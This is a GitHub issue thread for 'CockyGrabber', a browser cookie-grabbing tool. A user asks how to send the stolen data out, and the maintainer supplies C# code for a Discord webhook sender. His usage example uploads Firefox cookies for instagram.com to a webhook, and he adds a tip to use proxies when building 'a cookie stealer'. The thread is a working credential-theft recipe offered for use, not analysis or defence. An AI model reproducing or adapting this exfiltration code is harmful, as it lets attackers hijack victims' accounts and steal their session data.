### ISSUE TITLE
how to get it to work

### ISSUE THREAD

**Issue by urgeydad** [TheBackdoor/CockyGrabber#2]
yh so i downloaded it and now im asking how does it work like i dont see a string or codeline that sends the grabbed files to an email or something else could u explain rq?

**Comment by TheBackdoor** [comment]
Cockygrabber only grabs Cookies. you need to code the Email Function ur self

**Comment by urgeydad** [comment]
uhm could u help me with the discord webhook thing lol

**Comment by TheBackdoor** [comment]
_This is a simple Webhook sender Method:_
```cs
public static void SendMessageToWebhook(string webhookurl, string name, string content, string profilepic = "http://tinyurl.com/sdu6wxh")
{
	using (WebClient client = new WebClient())
	{
		NameValueCollection collection = new NameValueCollection(); // creates a collection of all the information that is needed for sending a message with it
		collection.Add("username", name);
		collection.Add("avatar_url", profilepic);
		collection.Add("content", content);
		client.UploadValues(webhookurl, collection); // upload the values, which will in this case send the message
	}
}
```
_Use it like that:_
```cs
FirefoxGrabber grabber = new FirefoxGrabber();
SendMessageToWebhook("https://yourdiscordwebhookurl.idk", "BotName", grabber.GetAllCookies(".instagram.com").ToString());
```

_you can also use a profilepic link but u dont need it(It will be black if you dont set a other profile pic: http://tinyurl.com/sdu6wxh)_

you should also use proxies if you want to make a cookie stealer so you dont get ratelimited or something...
